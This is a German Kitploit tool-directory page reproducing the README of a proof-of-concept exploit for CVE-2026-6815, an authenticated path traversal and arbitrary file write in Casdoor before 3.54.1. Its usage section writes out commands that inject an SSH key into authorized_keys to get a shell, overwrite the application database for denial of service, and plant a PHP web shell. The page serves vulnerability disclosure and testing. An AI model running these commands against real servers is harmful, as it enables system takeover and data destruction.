Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6815 — Authentifizierter Path-Traversal- und beliebiger Datei-Schreib-PoC-Exploit für Casdoor <3.54.1, der RCE per SSH-Schlüssel-Injektion, Web-Shell-Upload oder anhaltenden DoS durch Datenbank-Korruption ermöglicht. | Kitploit
Tools/GitHubGitHub/danilo-dellorco/cve-2026-6815
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

Authentifizierter Path-Traversal- und beliebiger Datei-Schreib-PoC-Exploit für Casdoor <3.54.1, der RCE per SSH-Schlüssel-Injektion, Web-Shell-Upload oder anhaltenden DoS durch Datenbank-Korruption ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
22vor 2 MonatenNoch nicht geprüft
Teilen

CVE-2026-6815 PoC/Exploit: Casdoor <3.54.1 Path Traversal & Arbitrary File Write (Authenticated)

Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2026-6815, eine Schwachstelle bezüglich beliebigem Dateischreiben und Path Traversal in Casdoor.

Die Schwachstelle wurde in Version 3.54.1 behoben.

Anforderungen

Der Angreifer muss an der Casdoor-Instanz mit Admin-Rechten oder gleichwertigen Benutzerrechten authentifiziert sein, die Zugriff zum Erstellen und/oder Bearbeiten von Storage-Providern haben.

Auswirkungen

  • Remote Code Execution (RCE): Durch Schreiben in sensible Speicherorte wie .ssh/authorized_keys, Crontabs oder Webroots.
  • Denial of Service (DoS): Durch Überschreiben von Anwendungsdatenbanken (casdoor.db) oder Kern-Binärdateien mit beliebigen Dateien, wodurch die Anwendung sofort gestoppt wird.

Technische Details

Casdoor erlaubt Administratoren die Konfiguration von Storage-Providern. Der Local File System-Provider bereinigt die pathPrefix-Konfiguration und den Parameter fullFilePath bei Ressourcen-Uploads nicht ordnungsgemäß.

Durch die Verwendung von Directory-Traversal-Sequenzen (../) kann ein authentifizierter Administrator das dedizierte Speicherverzeichnis verlassen und Dateien überall dort schreiben, wo der Casdoor-Prozess Berechtigungen besitzt.

Die Schwachstelle beruht auf unzureichender Pfadvalidierung in:

  • object/provider.go: Keine Validierung von pathPrefix beim Erstellen/Aktualisieren.
  • storage/local_file_system.go: Die Methode GetFullPath prüft nicht, ob der aufgelöste Pfad innerhalb der vorgesehenen Sandbox bleibt.

Verwendung

  1. Abhängigkeiten installieren:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. Den Exploit ausführen:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Verwendungsbeispiele

1. SSH-Key-Injektion für RCE

Schreiben Sie einen vom Angreifer kontrollierten öffentlichen Schlüssel in die Datei authorized_keys des Benutzers casdoor, um SSH-Zugriff zu erhalten.

Den SSH-Schlüssel generieren:

root@kitploit:~
ssh-keygen -f casdoor_rce

authorized_keys mit dem generierten öffentlichen Schlüssel überschreiben:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

Eine SSH-Shell auf dem entfernten Host mit dem privaten Schlüssel erhalten:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. Dauerhafter DoS (Datenbank-Korruption)

Überschreiben Sie die lokale Datenbankdatei der Anwendung (z. B. casdoor.db), um einen Denial of Service zu verursachen.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Web-Shell-Upload (Sekundäres Webroot)

Wenn der Server auf demselben Dateisystem einen sekundären Webserver (z. B. Apache/Nginx) betreibt, schreiben Sie eine Web-Shell in dessen Dokumentenroot.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. Benutzerdefinierte Organisation und Anwendung

Wenn Sie administrative Anmeldeinformationen für eine bestimmte Organisation und Anwendung (andere als die Standardwerte built-in und app-built-in) besitzen, geben Sie diese mit --orgname und --appname an.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

Referenzen

  • CERT/CC Vulnerability Note VU#937808
  • CVE-2026-6815 auf CVE.org
  • Red Hat Security Advisory: CVE-2026-6815

Haftungsausschluss

Diese Software dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Der Autor ist nicht für die missbräuchliche Verwendung dieser Informationen verantwortlich.

Autor

Schwachstelle entdeckt und PoC entwickelt von Danilo Dell'Orco (sixpain).

Tool herunterladen